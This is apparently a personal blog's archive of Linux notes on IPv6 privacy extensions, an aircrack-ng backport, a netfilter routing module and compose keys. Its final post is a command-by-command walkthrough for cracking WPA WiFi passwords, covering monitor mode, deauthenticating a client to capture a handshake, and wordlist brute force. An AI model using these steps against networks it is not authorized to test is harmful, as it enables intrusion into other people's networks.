Category Archives: Linux General

Notes which apply to all flavours of Linux systems

Implementing IPv6 Privacy Extensions (RFC4941)

IPv6 auto configuration on Linux will normally assign the same address every time when connecting to a specific network. This address would normally be formed from the network prefix and local interface MAC address.

When using IPv4 your identity is slightly masqued by NAT. Although your single public IP address may be tracked, it is hard to track individual devices that exist on the local network. This is not the case with IPv6 where there is no NAT. Every device has a visible unique public IP address that rarely changes.

RFC4941 (obsoletes 3041) defines privacy extensions to IPv6 which will randomly assign an additional Global IPv6 address to the interface. This additional random address will have the same network prefix and be used for outgoing internet connections.

To enable the privacy extensions under Linux (using Debian Wheezy):
echo 2 > /proc/sys/net/ipv6/conf/${ifname}/use_tempaddr
replace ${ifname} with the name of your interface, eg wlan0

Possible values for this setting:
(0=off, 1=assign, 2=prefer)

Now at least you will be anonymized amongst the other nodes of your local network.

Backport of Aircrack-ng for Debian Wheezy

I have created a backport of aircrack-ng based on the version in Jessie/Testing. This may be installed with the command:
dpkg -i aircrack-ng_1.1-6~bpo70+1_amd64.deb
(remove the package with command: dpkg -r aircrack-ng)
download here

This package is now available in Debian wheezy-backports.

Back in March 2012 I built the latest svn version from source, available here.
I have included the necessary scripts and binary files in the ‘bin/’ directory. Copy these to somewhere like: /usr/local/sbin/

ipt_ROUTE Netfilter module ported to Linux 2.6.31

The ipt_ROUTE module became depreciated in an earlier version of Linux 2.6 – however I needed it so ported it to Linux Kernel version 2.6.31.

Disclaimer: wherever possible iproute2 should be used to achieve the desired effect.

The sources include the Kernel module and extensions to iptables.

This module and iptables extension create a new target which may be used on the mangle table.
Target usage: -j ROUTE <option>
options:
--oif ifname - Route packet through `ifname' network interface
--iif ifname - Change packet's incoming interface to `ifname'
--gw ip - Route packet via this gateway `ip'
--continue - Route packet and continue traversing the rules. (Not valid with --iif or --tee)
--tee - Duplicate packet and route the duplicate, continue traversing the original packet. (Not valid with --iif or --continue)

I have tested the ported module on the PREROUTING and INPUT chains of the mangle table.

I use this module to route packets that have a destination IP address which matches a local IP address, out of an ethernet interface (using --oif option). These packets would normally be directed to the local system.

Enabling compose key to type unicode on Linux

The compose key may be used to type unicode characters easily on Linux systems…

All of these commands should be executed as a normal user, no root access required:

  1. Identify the key you want to use as your compose key, I use the ‘Windows’ key:
    • Run the application xev
    • Press the key you want to use as your compose key
    • Note down the keycode value (my Windows key identifies as keycode=133)
  2. Edit the file ~/.Xmodmap and insert the line
    keycode 133 = Multi_key
  3. Run xmodmap ~/.Xmodmap

Restart X and you will be able to use unicode:
<Compose key> + " + u = ü
<Compose key> + ' + e = é
<Compose key> + o + r = ®
<Compose key> + - + y = ¥

and many more…

(Tested and in current use on Debian Wheezy)

Brute Forcing WPA WiFi Encryption

WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Enter monitor mode: airmon-ng start wlan0
  3. Find nearby networks: airodump-ng mon0
  4. Identify the target BSSID and Channel number (-c option below)
  5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
  6. Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
  7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
  8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
  9. The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
  10. Stop monitor mode: airmon-ng stop mon0